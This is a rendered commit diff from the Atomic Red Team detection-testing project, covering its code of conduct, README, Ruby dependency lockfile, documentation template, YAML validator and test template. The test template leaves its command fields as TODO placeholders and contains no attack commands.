* Unacceptable behaviors include: [intimidating, harassive, abusive, discriminatory, derogatory or demeaning conduct](https://www.doi.gov/employees/anti-harassment/definitions) by any one in the community
* Harassment includes: offensive verbal comments related to (but not limited to) age, personal appearance, body size, disability, nationality, race, ethnicity, gender identity and expression, level of experience or academics, religion, or sexual identity and orientation, or other protected category; inappropriate deliberate intimidation, stalking or following; inappropriate direct messages, and unwelcome sexual attention, imagery, or language
* Written, verbal or other abuse, [trolling](https://dictionary.cambridge.org/us/dictionary/english/trolling), intimidation, threats, annoyance, harassment, stalking, and/or spamming against any person, which in any way creates a disturbance that is disruptive or dangerous, or creates apprehension in a person
* Harassing individuals in a public or private form.
* Publishing others' private information, such as a physical or email address, without explicit permission
* Other conduct that could reasonably be considered inappropriate in a professional setting
* The use of sexualized language or imagery and unwelcome sexual attention or advances
* Trolling, insulting/derogatory comments, and personal or political attacks
* Public or private harassment
* Publishing others' private information, such as a physical or electronic address, without explicit permission
* Other conduct which could reasonably be considered inappropriate in a professional setting
## Reporting
## Our Responsibilities
If you see anything that you believe breaks our community guidelines, no matter if its privately or publicly witnessed, please reach out to the **Red Canary Open Source Team** at [email](mailto:opensource@redcanary.com) with screenshots of the post/text and a link to the post or comments.
Project maintainers are responsible for clarifying the standards of acceptable behavior and are expected to take appropriate and fair corrective action in response to any instances of unacceptable behavior.
## Enforcement & Consequences
Instances of abusive, harassing, or otherwise unacceptable behavior may be reported by contacting the Community Manager. Unacceptable behavior will not be tolerated by community members, maintainers, and Red Canary team members. The Atomic Red Team Community Manager and maintainers will review and investigate all complaints.
Anyone asked to stop unacceptable behavior is expected to comply immediately. If an Atomic Red Team community member (anyone contributing to our [GitHub Repo](https://github.com/redcanaryco/atomic-red-team) or [Community Slack](https://slack.atomicredteam.io/)) engages in unacceptable behavior, the Community Manager may take any temporary or permanent action they deem appropriate, up to and including immediate expulsion from the Atomic Red Team community without warning.
Atomic Red Team maintainers who do not follow or enforce the Code of Conduct in good faith may face temporary or permanent repercussions as determined by other members of the project's leadership.
## Managers & Maintainers Responsibilities
Atomic Red Team Community Managers are responsible for upholding the standards of acceptable behavior and are expected to take appropriate and fair corrective action in response to any instances of unacceptable behavior.
Atomic Red Team Maintainers have the right and responsibility to remove, edit, or reject comments, commits, code, wiki edits, issues, and other contributions that are not aligned to this Code of Conduct, or that they otherwise deem inappropriate, threatening, offensive, or harmful.
Project maintainers have the right and responsibility to remove, edit, or reject comments, commits, code, wiki edits, issues, and other contributions that are not aligned to this Code of Conduct, or to ban temporarily or permanently any contributor for other behaviors that they deem inappropriate, threatening, offensive, or harmful.
## Scope
This Code of Conduct applies to all of the Atomic Red Team, and “Atomic Family,” project spaces, including public spaces where an individual is representing the project or its community. Examples of representing the project or community include using an official project e-mail address, posting an official social media account, or acting as an appointed representative at an online or offline event.
This Code of Conduct applies both within project spaces and in public spaces when an individual is representing the project or its community. Examples of representing a project or community include using an official project e-mail address, posting via an official social media account, or acting as an appointed representative at an online or offline event. Representation of a project may be further defined and clarified by project maintainers.
* [Atomic Red Team Website](https://atomicredteam.io/)
## Enforcement
* [Atomic Red Team Slack](https://slack.atomicredteam.io/)
Instances of abusive, harassing, or otherwise unacceptable behavior may be reported by contacting the project team at research at redcanary.com. The project team will review and investigate all complaints, and will respond in a way that it deems appropriate to the circumstances. The project team is obligated to maintain confidentiality with regard to the reporter of an incident. Further details of specific enforcement policies may be posted separately.
* [Atomic Red Team GitHub](https://github.com/redcanaryco/atomic-red-team)
* **Atomic Family**
* [Invoke-AtomicRedTeam](https://github.com/redcanaryco/invoke-atomicredteam)
* [AtomicTestHarnesses](https://github.com/redcanaryco/atomictestharnesses)
* [Chain Reactor](https://github.com/redcanaryco/chain-reactor)
Project maintainers who do not follow or enforce the Code of Conduct in good faith may face temporary or permanent repercussions as determined by other members of the project's leadership.
## Attribution
Gemfile.lock
+254
View File
@@ -0,0 +1,254 @@
PATH
remote: .
specs:
atomic-red-team (1.0)
GEM
remote: https://rubygems.org/
specs:
activesupport (4.2.10)
i18n (~> 0.7)
minitest (~> 5.1)
thread_safe (~> 0.3, >= 0.3.4)
tzinfo (~> 1.1)
addressable (2.5.2)
public_suffix (>= 2.0.2, < 4.0)
coffee-script (2.4.1)
coffee-script-source
execjs
coffee-script-source (1.11.1)
colorator (1.1.0)
commonmarker (0.17.13)
ruby-enum (~> 0.5)
concurrent-ruby (1.1.4)
dnsruby (1.61.2)
addressable (~> 2.5)
em-websocket (0.5.1)
eventmachine (>= 0.12.9)
http_parser.rb (~> 0.6.0)
ethon (0.12.0)
ffi (>= 1.3.0)
eventmachine (1.2.7)
execjs (2.7.0)
faraday (0.15.4)
multipart-post (>= 1.2, < 3)
ffi (1.10.0)
forwardable-extended (2.6.0)
gemoji (3.0.0)
github-pages (193)
activesupport (= 4.2.10)
github-pages-health-check (= 1.8.1)
jekyll (= 3.7.4)
jekyll-avatar (= 0.6.0)
jekyll-coffeescript (= 1.1.1)
jekyll-commonmark-ghpages (= 0.1.5)
jekyll-default-layout (= 0.1.4)
jekyll-feed (= 0.11.0)
jekyll-gist (= 1.5.0)
jekyll-github-metadata (= 2.9.4)
jekyll-mentions (= 1.4.1)
jekyll-optional-front-matter (= 0.3.0)
jekyll-paginate (= 1.1.0)
jekyll-readme-index (= 0.2.0)
jekyll-redirect-from (= 0.14.0)
jekyll-relative-links (= 0.5.3)
jekyll-remote-theme (= 0.3.1)
jekyll-sass-converter (= 1.5.2)
jekyll-seo-tag (= 2.5.0)
jekyll-sitemap (= 1.2.0)
jekyll-swiss (= 0.4.0)
jekyll-theme-architect (= 0.1.1)
jekyll-theme-cayman (= 0.1.1)
jekyll-theme-dinky (= 0.1.1)
jekyll-theme-hacker (= 0.1.1)
jekyll-theme-leap-day (= 0.1.1)
jekyll-theme-merlot (= 0.1.1)
jekyll-theme-midnight (= 0.1.1)
jekyll-theme-minimal (= 0.1.1)
jekyll-theme-modernist (= 0.1.1)
jekyll-theme-primer (= 0.5.3)
jekyll-theme-slate (= 0.1.1)
jekyll-theme-tactile (= 0.1.1)
jekyll-theme-time-machine (= 0.1.1)
jekyll-titles-from-headings (= 0.5.1)
jemoji (= 0.10.1)
kramdown (= 1.17.0)
liquid (= 4.0.0)
listen (= 3.1.5)
mercenary (~> 0.3)
minima (= 2.5.0)
nokogiri (>= 1.8.2, < 2.0)
rouge (= 2.2.1)
terminal-table (~> 1.4)
github-pages-health-check (1.8.1)
addressable (~> 2.3)
dnsruby (~> 1.60)
octokit (~> 4.0)
public_suffix (~> 2.0)
typhoeus (~> 1.3)
html-pipeline (2.10.0)
activesupport (>= 2)
nokogiri (>= 1.4)
http_parser.rb (0.6.0)
i18n (0.9.5)
concurrent-ruby (~> 1.0)
jekyll (3.7.4)
addressable (~> 2.4)
colorator (~> 1.0)
em-websocket (~> 0.5)
i18n (~> 0.7)
jekyll-sass-converter (~> 1.0)
jekyll-watch (~> 2.0)
kramdown (~> 1.14)
liquid (~> 4.0)
mercenary (~> 0.3.3)
pathutil (~> 0.9)
rouge (>= 1.7, < 4)
safe_yaml (~> 1.0)
jekyll-avatar (0.6.0)
jekyll (~> 3.0)
jekyll-coffeescript (1.1.1)
coffee-script (~> 2.2)
coffee-script-source (~> 1.11.1)
jekyll-commonmark (1.2.0)
commonmarker (~> 0.14)
jekyll (>= 3.0, < 4.0)
jekyll-commonmark-ghpages (0.1.5)
commonmarker (~> 0.17.6)
jekyll-commonmark (~> 1)
rouge (~> 2)
jekyll-default-layout (0.1.4)
jekyll (~> 3.0)
jekyll-feed (0.11.0)
jekyll (~> 3.3)
jekyll-gist (1.5.0)
octokit (~> 4.2)
jekyll-github-metadata (2.9.4)
jekyll (~> 3.1)
octokit (~> 4.0, != 4.4.0)
jekyll-mentions (1.4.1)
html-pipeline (~> 2.3)
jekyll (~> 3.0)
jekyll-optional-front-matter (0.3.0)
jekyll (~> 3.0)
jekyll-paginate (1.1.0)
jekyll-readme-index (0.2.0)
jekyll (~> 3.0)
jekyll-redirect-from (0.14.0)
jekyll (~> 3.3)
jekyll-relative-links (0.5.3)
jekyll (~> 3.3)
jekyll-remote-theme (0.3.1)
jekyll (~> 3.5)
rubyzip (>= 1.2.1, < 3.0)
jekyll-sass-converter (1.5.2)
sass (~> 3.4)
jekyll-seo-tag (2.5.0)
jekyll (~> 3.3)
jekyll-sitemap (1.2.0)
jekyll (~> 3.3)
jekyll-swiss (0.4.0)
jekyll-theme-architect (0.1.1)
jekyll (~> 3.5)
jekyll-seo-tag (~> 2.0)
jekyll-theme-cayman (0.1.1)
jekyll (~> 3.5)
jekyll-seo-tag (~> 2.0)
jekyll-theme-dinky (0.1.1)
jekyll (~> 3.5)
jekyll-seo-tag (~> 2.0)
jekyll-theme-hacker (0.1.1)
jekyll (~> 3.5)
jekyll-seo-tag (~> 2.0)
jekyll-theme-leap-day (0.1.1)
jekyll (~> 3.5)
jekyll-seo-tag (~> 2.0)
jekyll-theme-merlot (0.1.1)
jekyll (~> 3.5)
jekyll-seo-tag (~> 2.0)
jekyll-theme-midnight (0.1.1)
jekyll (~> 3.5)
jekyll-seo-tag (~> 2.0)
jekyll-theme-minimal (0.1.1)
jekyll (~> 3.5)
jekyll-seo-tag (~> 2.0)
jekyll-theme-modernist (0.1.1)
jekyll (~> 3.5)
jekyll-seo-tag (~> 2.0)
jekyll-theme-primer (0.5.3)
jekyll (~> 3.5)
jekyll-github-metadata (~> 2.9)
jekyll-seo-tag (~> 2.0)
jekyll-theme-slate (0.1.1)
jekyll (~> 3.5)
jekyll-seo-tag (~> 2.0)
jekyll-theme-tactile (0.1.1)
jekyll (~> 3.5)
jekyll-seo-tag (~> 2.0)
jekyll-theme-time-machine (0.1.1)
jekyll (~> 3.5)
jekyll-seo-tag (~> 2.0)
jekyll-titles-from-headings (0.5.1)
jekyll (~> 3.3)
jekyll-watch (2.1.2)
listen (~> 3.0)
jemoji (0.10.1)
gemoji (~> 3.0)
html-pipeline (~> 2.2)
jekyll (~> 3.0)
kramdown (1.17.0)
liquid (4.0.0)
listen (3.1.5)
rb-fsevent (~> 0.9, >= 0.9.4)
rb-inotify (~> 0.9, >= 0.9.7)
ruby_dep (~> 1.2)
mercenary (0.3.6)
mini_portile2 (2.4.0)
minima (2.5.0)
jekyll (~> 3.5)
jekyll-feed (~> 0.9)
jekyll-seo-tag (~> 2.1)
minitest (5.11.3)
multipart-post (2.0.0)
nokogiri (1.10.1)
mini_portile2 (~> 2.4.0)
octokit (4.13.0)
sawyer (~> 0.8.0, >= 0.5.3)
pathutil (0.16.2)
forwardable-extended (~> 2.6)
public_suffix (2.0.5)
rb-fsevent (0.10.3)
rb-inotify (0.10.0)
ffi (~> 1.0)
rouge (2.2.1)
ruby-enum (0.7.2)
i18n
ruby_dep (1.5.0)
rubyzip (1.2.2)
safe_yaml (1.0.4)
sass (3.7.3)
sass-listen (~> 4.0.0)
sass-listen (4.0.0)
rb-fsevent (~> 0.9, >= 0.9.4)
rb-inotify (~> 0.9, >= 0.9.7)
sawyer (0.8.1)
addressable (>= 2.3.5, < 2.6)
faraday (~> 0.8, < 1.0)
terminal-table (1.8.0)
unicode-display_width (~> 1.1, >= 1.1.1)
thread_safe (0.3.6)
typhoeus (1.3.1)
ethon (>= 0.9.0)
tzinfo (1.2.5)
thread_safe (~> 0.1)
unicode-display_width (1.4.1)
PLATFORMS
ruby
DEPENDENCIES
atomic-red-team!
github-pages
BUNDLED WITH
1.16.1
README.md
+47 -25
View File
@@ -1,39 +1,61 @@
<p><img src="https://redcanary.com/wp-content/uploads/Atomic-Red-Team-Logo.png" width="150px" /></p>
# Atomic Red Team
[![CircleCI](https://circleci.com/gh/redcanaryco/atomic-red-team.svg?style=svg)](https://circleci.com/gh/redcanaryco/atomic-red-team)
![GitHub Action Status](https://github.com/redcanaryco/atomic-red-team/actions/workflows/validate-atomics.yml/badge.svg?branch=master)
Atomic Red Team allows every security team to test their controls by executing simple
"atomic tests" that exercise the same techniques used by adversaries (all mapped to
[Mitre's ATT&CK](https://attack.mitre.org/wiki/Main_Page)).
Atomic Red Team™ is a library of tests mapped to the
[MITRE ATT&CK®](https://attack.mitre.org/) framework. Security teams can use
Atomic Red Team to quickly, portably, and reproducibly test their environments.
## Philosophy
## Get started
Atomic Red Team is a library of simple tests that every security team can execute to test their controls. Tests are
focused, have few dependencies, and are defined in a structured format that be used by automation frameworks.
You can execute atomic tests directly from the command line, no installation
required. See the [Getting started](https://github.com/redcanaryco/atomic-red-team/wiki/Getting-Started)
page of our wiki.
Three key beliefs made up the Atomic Red Team charter:
- **Teams need to be able to test everything from specific technical controls to outcomes.**
Our security teams do not want to operate with a “hopes and prayers” attitude toward detection. We need to know
what our controls and program can detect, and what it cannot. We dont have to detect every adversary, but we
do believe in knowing our blind spots.
For a more robust testing experience, consider using an execution framework like
[Invoke-Atomic](https://github.com/redcanaryco/invoke-atomicredteam).
- **We should be able to run a test in less than five minutes.**
Most security tests and automation tools take a tremendous amount of time to install, configure, and execute.
We coined the term "atomic tests" because we felt there was a simple way to decompose tests so most could be
run in a few minutes.
## Learn more
The best test is the one you actually run.
The Atomic Red Team documentation is available as a [wiki](https://github.com/redcanaryco/atomic-red-team/wiki/).
- **We need to keep learning how adversaries are operating.**
Most security teams dont have the benefit of seeing a wide variety of adversary types and techniques crossing
their desk every day. Even we at Red Canary only come across a fraction of the possible techniques being used,
which makes the community working together essential to making us all better.
For information about the philosophy and development of Atomic Red Team, visit
our website at <https://atomicredteam.io>.
See: https://atomicredteam.io
## Contribute to Atomic Red Team
## Having trouble?
Atomic Red Team is open source and community developed. If you're interested in
becoming a contributor, check out these resources:
Join the community on Slack at [https://atomicredteam.slack.com](https://atomicredteam.slack.com)
- Join our [Slack workspace](https://slack.atomicredteam.io) and get involved
with the community. Don't forget to review the [code of conduct](CODE_OF_CONDUCT.md)
before you join.
- Report bugs and request new features by [submitting an issue](https://github.com/redcanaryco/atomic-red-team/issues/new/choose).
- Read our [contribution guide](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
for more information about contributing directly to this repository.
- Check the [license](LICENSE.txt) for information regarding the distribution
and modification of Atomic Red Team.
## Getting Started
* [Getting Started With Atomic Tests](https://atomicredteam.io/testing)
* Peruse the [Complete list of Atomic Tests](atomics/index.md) and the [ATT&CK Matrix](atomics/matrix.md)
- Windows [Tests](atomics/windows-index.md) and [Matrix](atomics/windows-matrix.md)
- macOS [Tests](atomics/macos-index.md) and [Matrix](atomics/macos-matrix.md)
- Linux [Tests](atomics/linux-index.md) and [Matrix](atomics/linux-matrix.md)
* [Fork](https://github.com/redcanaryco/atomic-red-team/fork) and [Contribute](https://atomicredteam.io/contributing) your own modifications
* [Doing more with Atomic Red Team](#doing-more-with-atomic-red-team)
* [Using the Atomic Red Team Ruby API](#using-the-atomic-red-team-ruby-api)
* [Bonus APIs: Ruby ATT&CK API](#bonus-apis-ruby-attck-api)
* [Execution Frameworks](https://github.com/redcanaryco/atomic-red-team/blob/master/execution-frameworks)
* Have questions? Join the community on Slack at [https://atomicredteam.slack.com](https://atomicredteam.slack.com)
* Need a Slack invitation? Grab one at [https://slack.atomicredteam.io/](https://slack.atomicredteam.io/)
## Code of Conduct
In order to have a more open and welcoming community, Atomic Red Team adheres to a
[code of conduct](CODE_OF_CONDUCT.md).
## License
See the [LICENSE](https://github.com/redcanaryco/atomic-red-team/blob/master/LICENSE.txt) file.
atomic-red-team.gemspec
+2 -2
View File
@@ -3,7 +3,7 @@ Gem::Specification.new do |s|
s.name = 'atomic-red-team'
s.version = '1.0'
s.authors = ['Red Canary', 'Casey Smith', 'Mike Haag']
s.email = ['it@redcanary.com', 'opensource@redcanary.com']
s.email = ['it@redcanary.com', 'casey.smith@redcanary.com', 'mike.haag@redcanary.com']
s.summary = 'Small, highly portable, community developed detection tests mapped to ATT&CK.'
s.license = "MIT"
s.homepage = "https://redcanary.com/atomic-red-team"
@@ -12,4 +12,4 @@ Gem::Specification.new do |s|
s.require_paths = %w(atomic_red_team)
s.add_development_dependency 'github-pages'
end
end
atomic_red_team/atomic_doc_template.md.erb
+12 -58
View File
@@ -1,6 +1,6 @@
# <%= technique['identifier'] %> - <%= technique['name'] -%>
## [Description from ATT&CK](https://attack.mitre.org/techniques/<%= technique['identifier'].gsub(/\./, '/') %>)
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/<%= technique['identifier'] %>)
<blockquote><%= technique['description'] %></blockquote>
## Atomic Tests
@@ -13,83 +13,37 @@
<br/>
## Atomic Test #<%= test_number+1 %> - <%= test['name'] %>
<%= test['description'].strip -%>
<%= test['description'] -%>
**Supported Platforms:** <%= test['supported_platforms'].collect do |p|
case p
when 'macos'
'macOS'
when 'centos'
'CentOS'
else
p.capitalize
end
end.join(', ') %>
**auto_generated_guid:** <%= test['auto_generated_guid'] %>
<%def cleanup(input)
input.to_s.strip.gsub(/\\/,"&#92;")
end%>
<% if test['input_arguments'].to_a.count > 0 %>
#### Inputs:
| Name | Description | Type | Default Value |
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
<% test['input_arguments'].each do |arg_name, arg_options| -%>
| <%= cleanup(arg_name) %> | <%= cleanup(arg_options['description']) %> | <%= cleanup(arg_options['type']) %> | <%= cleanup(arg_options['default']) %>|
| <%= arg_name %> | <%= arg_options['description'] %> | <%= arg_options['type'] %> | <%= arg_options['default'] %>|
<% end -%>
<% end -%>
<%- if test['executor']['name'] == 'manual' -%>
#### Run it with these steps! <%- if test['executor']['elevation_required'] -%> Elevation Required (e.g. root or admin) <%- end -%>
#### Run it with these steps!
<%= test['executor']['steps'] %>
<%- else -%>
#### Attack Commands: Run with `<%= test['executor']['name'] %>`! <%- if test['executor']['elevation_required'] -%> Elevation Required (e.g. root or admin) <%- end -%>
<%def get_language(executor)
language = executor
if executor == "command_prompt"
language = "cmd"
elsif executor == "manual"
language = ""
end
language
end%>
```<%= get_language(test['executor']['name']) %>
#### Run it with `<%= test['executor']['name'] %>`!
```
<%= test['executor']['command'].to_s.strip %>
```
<%- end -%>
<%- if test['executor']['cleanup_command'] != nil -%>
#### Cleanup Commands:
```<%= get_language(test['executor']['name']) %>
<%= test['executor']['cleanup_command'].to_s.strip %>
```
<%- end -%>
<% if test['dependencies'].to_a.count > 0 %>
<% dependency_executor = test['executor']['name'] %>
#### Dependencies: Run with `<%- if test['dependency_executor_name'] != nil%><% dependency_executor = test['dependency_executor_name'] %><%= test['dependency_executor_name'] %><%- else -%><%= test['executor']['name'] %><%- end -%>`!
<% test['dependencies'].each do | dep | -%>
##### Description: <%= dep['description'].strip %>
##### Check Prereq Commands:
```<%= get_language(dependency_executor) %>
<%= dep['prereq_command'].strip %>
```
##### Get Prereq Commands:
```<%= get_language(dependency_executor) %>
<%= dep['get_prereq_command'].strip %>
```
<% end -%>
<% end -%>
<br/>
<%- end -%>
<%- end -%>
atomic_red_team/atomic_red_team.rb
+13 -88
View File
@@ -1,7 +1,6 @@
require 'yaml'
require 'erb'
require 'attack_api'
require 'securerandom'
class AtomicRedTeam
ATTACK_API = Attack.new
@@ -47,42 +46,26 @@ class AtomicRedTeam
#
# Returns a Markdown formatted Github link to a technique. This will be to the edit page for
# techniques that already have one or more Atomic Red Team tests, or the create page for
# techniques that have no existing tests for the given OS.
# techniques that have no existing tests.
#
def github_link_to_technique(technique, include_identifier: false, only_platform: self.only_platform)
def github_link_to_technique(technique, include_identifier: false, link_new_to_contrib: true)
technique_identifier = ATTACK_API.technique_identifier_for_technique(technique).upcase
link_display = "#{"#{technique_identifier.upcase} " if include_identifier}#{technique['name']}"
yaml_file = "#{ATOMICS_DIRECTORY}/#{technique_identifier}/#{technique_identifier}.yaml"
markdown_file = "#{ATOMICS_DIRECTORY}/#{technique_identifier}/#{technique_identifier}.md"
if atomic_yaml_has_test_for_platform(yaml_file, only_platform) && (File.exists? markdown_file)
if File.exists? "#{ATOMICS_DIRECTORY}/#{technique_identifier}/#{technique_identifier}.md"
# we have a file for this technique, so link to it's Markdown file
"[#{link_display}](../../#{technique_identifier}/#{technique_identifier}.md)"
"[#{link_display}](./#{technique_identifier}/#{technique_identifier}.md)"
else
# we don't have a file for this technique, or there are not tests for the given platform, so link to an edit page
"#{link_display} [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)"
# we don't have a file for this technique, so link to an edit page
"#{link_display} [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)"
end
end
def atomic_yaml_has_test_for_platform(yaml_file, only_platform)
has_test_for_platform = false
if File.exists? yaml_file
yaml = YAML.load_file(yaml_file)
yaml['atomic_tests'].each_with_index do |atomic, i|
if atomic["supported_platforms"].any? {|platform| platform.downcase =~ only_platform}
has_test_for_platform = true
break
end
end
end
return has_test_for_platform
end
def validate_atomic_yaml!(yaml, used_guids_file, unique_guid_array)
def validate_atomic_yaml!(yaml)
raise("YAML file has no elements") if yaml.nil?
raise('`attack_technique` element is required') unless yaml.has_key?('attack_technique')
raise('`attack_technique` element must be a string') unless yaml['attack_technique'].is_a?(String)
raise('`attack_technique` element must be an array') unless yaml['attack_technique'].is_a?(String)
raise('`display_name` element is required') unless yaml.has_key?('display_name')
raise('`display_name` element must be an array') unless yaml['display_name'].is_a?(String)
@@ -94,34 +77,20 @@ class AtomicRedTeam
yaml['atomic_tests'].each_with_index do |atomic, i|
raise("`atomic_tests[#{i}].name` element is required") unless atomic.has_key?('name')
raise("`atomic_tests[#{i}].name` element must be a string") unless atomic['name'].is_a?(String)
if atomic.has_key?('auto_generated_guid')
guid = atomic["auto_generated_guid"].to_s
raise("`atomic_tests[#{i}].auto_generated_guid` element not a proper guid") unless /[a-f0-9]{8}-[a-f0-9]{4}-4[a-f0-9]{3}-[89aAbB][a-f0-9]{3}-[a-f0-9]{12}/.match(guid)
raise("`atomic_tests[#{i}].auto_generated_guid` element must be unique") unless !unique_guid_array.include?(guid)
unique_guid_array << guid
end
raise("`atomic_tests[#{i}].description` element is required") unless atomic.has_key?('description')
raise("`atomic_tests[#{i}].description` element must be a string") unless atomic['description'].is_a?(String)
raise("`atomic_tests[#{i}].supported_platforms` element is required") unless atomic.has_key?('supported_platforms')
raise("`atomic_tests[#{i}].supported_platforms` element must be an Array (was a #{atomic['supported_platforms'].class.name})") unless atomic['supported_platforms'].is_a?(Array)
valid_supported_platforms = ['windows', 'macos', 'linux', 'office-365', 'azure-ad', 'google-workspace', 'saas', 'iaas', 'containers', 'iaas:aws', 'iaas:azure', 'iaas:gcp']
valid_supported_platforms = ['windows', 'centos', 'ubuntu', 'macos', 'linux']
atomic['supported_platforms'].each do |platform|
if !valid_supported_platforms.include?(platform)
raise("`atomic_tests[#{i}].supported_platforms` '#{platform}' must be one of #{valid_supported_platforms.join(', ')}")
end
end
if atomic['dependencies']
atomic['dependencies'].each do |dependency|
raise("`atomic_tests[#{i}].dependencies` '#{dependency}' must be have a description}") unless dependency.has_key?('description')
raise("`atomic_tests[#{i}].dependencies` '#{dependency}' must be have a prereq_command}") unless dependency.has_key?('prereq_command')
raise("`atomic_tests[#{i}].dependencies` '#{dependency}' must be have a get_prereq_command}") unless dependency.has_key?('get_prereq_command')
end
end
(atomic['input_arguments'] || {}).each_with_index do |arg_kvp, iai|
arg_name, arg = arg_kvp
raise("`atomic_tests[#{i}].input_arguments[#{iai}].description` element is required") unless arg.has_key?('description')
@@ -142,7 +111,7 @@ class AtomicRedTeam
raise("`atomic_tests[#{i}].executor.name` element must be a string") unless executor['name'].is_a?(String)
raise("`atomic_tests[#{i}].executor.name` element must be lowercased and underscored (was #{executor['name']})") unless executor['name'] =~ /[a-z_]+/
valid_executor_types = ['command_prompt', 'sh', 'bash', 'powershell', 'manual', 'aws', 'az', 'gcloud', 'kubectl']
valid_executor_types = ['command_prompt', 'sh', 'bash', 'powershell', 'manual']
case executor['name']
when 'manual'
raise("`atomic_tests[#{i}].executor.steps` element is required") unless executor.has_key?('steps')
@@ -152,7 +121,7 @@ class AtomicRedTeam
string: executor['steps'],
string_description: "atomic_tests[#{i}].executor.steps"
when 'command_prompt', 'sh', 'bash', 'powershell', 'aws', 'az', 'gcloud', 'kubectl'
when 'command_prompt', 'sh', 'bash', 'powershell'
raise("`atomic_tests[#{i}].executor.command` element is required") unless executor.has_key?('command')
raise("`atomic_tests[#{i}].executor.command` element must be a string") unless executor['command'].is_a?(String)
@@ -167,50 +136,6 @@ class AtomicRedTeam
end
end
def record_used_guids!(yaml, used_guids_file)
return unless !yaml.nil?
yaml['atomic_tests'].each_with_index do |atomic, i|
next unless atomic.has_key?('auto_generated_guid')
guid = atomic["auto_generated_guid"].to_s
add_guid_to_used_guid_file(guid, used_guids_file) unless guid == ''
end
end
def generate_guids_for_yaml!(path, used_guids_file)
text = File.read(path)
# add the "auto_generated_guid:" element after the "- name:" element if it isn't already there
text.gsub!(/(?i)(^([ \t]*-[ \t]*)name:.*$(?!\s*auto_generated_guid))/) { |m| "#{$1}\n#{$2.gsub(/-/," ")}auto_generated_guid:"}
# fill the "auto_generated_guid:" element in if it doesn't contain a guid
text.gsub!(/(?i)^([ \t]*auto_generated_guid:)(?!([ \t]*[a-f0-9]{8}-[a-f0-9]{4}-4[a-f0-9]{3}-[89aAbB][a-f0-9]{3}-[a-f0-9]{12})).*$/) { |m| "#{$1} #{get_unique_guid!(used_guids_file)}"}
File.open(path, "w") { |file| file << text }
end
# generates a unique guid and records the guid as having been used by writing it to the used_guids_file
def get_unique_guid!(used_guids_file)
new_guid = ''
20.times do |i| # if it takes more than 20 tries to get a unique guid, there must be something else going on
new_guid = SecureRandom.uuid
break unless !is_unique_guid(new_guid, used_guids_file)
end
# add this new unique guid to the used guids file
add_guid_to_used_guid_file(new_guid, used_guids_file)
return new_guid
end
# add guid to used guid file if it is the proper format and is not already in the file. raises an exception if guid isn't valid
def add_guid_to_used_guid_file(guid, used_guids_file)
open(used_guids_file, 'a') { |f|
raise("the GUID (#{guid}) does not match the required format for the `auto_generated_guid` element") unless /[a-f0-9]{8}-[a-f0-9]{4}-4[a-f0-9]{3}-[89aAbB][a-f0-9]{3}-[a-f0-9]{12}/ =~ guid
f.puts guid unless !is_unique_guid(guid, used_guids_file)
}
end
def is_unique_guid(guid, used_guids_file)
return !File.foreach(used_guids_file).grep(/#{guid}/).any?
end
#
# Validates that the arguments (specified in "#{arg}" format) in a string
# match the input_arguments for a test
atomic_red_team/atomic_test_template.yaml
+4 -14
View File
@@ -10,27 +10,17 @@ atomic_tests:
supported_platforms:
- windows
- macos
- centos
- ubuntu
- linux
input_arguments:
output_file:
description: TODO
type: TODO
type: todo
default: TODO
dependency_executor_name: powershell # (optional) The executor for the prereq commands, defaults to the same executor used by the attack commands.
dependencies: # (optional)
- description: |
TODO
prereq_command: | # Commands to check if prerequisites for running this test are met. For the "command_prompt" executor, if any command returns a non-zero exit code, the prerequisites are not met. For the "powershell" executor, all commands are run as a script block and the script block must return 0 for success.
TODO
get_prereq_command: | # Commands to meet this prerequisite or a message describing how to meet this prerequisite.
TODO
executor:
name: command_prompt
elevation_required: true # Indicates whether command must be run with admin privileges. If the elevation_required attribute is not defined, the value is assumed to be false.
command: | # These are the actaul attack commands, at least one command must be provided.
TODO
cleanup_command: | # You can remove the cleanup_command section if there are no cleanup commands.
command: |
TODO
atomic_red_team/attack_api.rb
+4 -8
View File
@@ -22,7 +22,6 @@ class Attack
'collection',
'exfiltration',
'command-and-control',
'impact'
]
end
@@ -74,10 +73,9 @@ class Attack
def techniques_by_tactic(only_platform: /.*/)
techniques_by_tactic = Hash.new {|h, k| h[k] = []}
techniques.each do |technique|
next unless !technique['x_mitre_platforms'].nil?
next unless technique['x_mitre_platforms'].any? { |platform| platform.downcase.sub(" ", "-") =~ only_platform }
next unless technique['x_mitre_platforms'].any? {|platform| platform.downcase =~ only_platform}
technique.fetch('kill_chain_phases', []).select { |phase| phase['kill_chain_name'] == 'mitre-attack' }.each do |tactic|
technique.fetch('kill_chain_phases', []).select {|phase| phase['kill_chain_name'] == 'mitre-attack'}.each do |tactic|
techniques_by_tactic[tactic.fetch('phase_name')] << technique
end
end
@@ -88,10 +86,8 @@ class Attack
# Returns a list of all ATT&CK techniques
#
def techniques
return @techniques unless @techniques.nil?
# pull out the attack pattern objects
@techniques = attack_stix.fetch("objects").select do |item|
attack_stix.fetch("objects").select do |item|
item.fetch('type') == 'attack-pattern' && item.fetch('external_references', []).select do |references|
references['source_name'] == 'mitre-attack'
end
@@ -114,4 +110,4 @@ class Attack
end
end
end
end
end
atomic_red_team/enterprise-attack.json
+112226 -448546
View File
File diff suppressed because one or more lines are too long
atomic_red_team/spec.yaml
+48 -60
View File
@@ -13,16 +13,13 @@
# atomic_red_team/atomics
# atomic_red_team/atomics/T1234
# atomic_red_team/atomics/T1234/T1234.yaml <-- this is where all the atomic tests live
# atomic_red_team/atomics/T1234/src/payload1.sct <-- a payload file needed by one of the T1234 atomics (human readable)
# atomic_red_team/atomics/T1234/bin/payload2.dll <-- another payload file needed by one of the T1234 atomics (binary)
# atomic_red_team/atomics/T1234/payload1.sct <-- a payload file needed by one of the T1234 atomics
# atomic_red_team/atomics/T1234/payload2.dll <-- another payload file needed by one of the T1234 atomics
#
# In general, a set of atomic tests for a technique should never depend on payloads
# or supporting files from other atomic directories. We want to keep things nice and close.
# Use git symlinks if you really need to share files between techniques.
#
# Atomic tests should be fully automated whenever possible, requiring no continued interaction.
# Include any needed options to execute the commands seamlessly, for example SysInternal's -accepteula option or any -q or -quiet modes.
#
# To validate your atomics, run `bin/validate_atomics.rb`
---
attack_technique: TXXXX # (with a capital T, Example: 'T1123')
@@ -38,7 +35,6 @@ atomic_tests:
# This is the first atomic test
#
